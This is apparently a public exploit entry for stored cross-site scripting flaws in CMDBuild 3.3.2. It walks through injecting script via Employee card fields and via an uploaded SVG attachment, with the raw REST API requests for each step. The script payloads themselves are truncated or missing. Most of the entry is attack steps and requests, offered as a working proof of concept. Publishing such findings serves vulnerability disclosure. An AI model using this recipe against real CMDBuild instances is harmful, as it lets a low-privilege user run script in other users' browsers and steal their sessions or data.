# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux
Summary:
Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections
Proof of concepts :
Stored Xss Example:
1-Login to you'r Dashboard As a low privilege user
2-Click On Basic archives and Employee
3- +Add card Employee
4- Enter your xss payload in parameters
5-On added employee click on "Open Relation Graph"
POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close
{"_type":"Employee","_tenant":"","Code":"\">","Description":null,"Surname":"\">","Name":"\">","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
------------------------------------------------------------------------
File upload Xss example:
1-Click on Basic archives
2-Click on Workplace - + Add card Workplace
3-Select "attachments" icon - +Add attachment + image
4-Upload your svg file with xss payload
5-Click on preview and Right click open in new tab
Request:
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open
-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml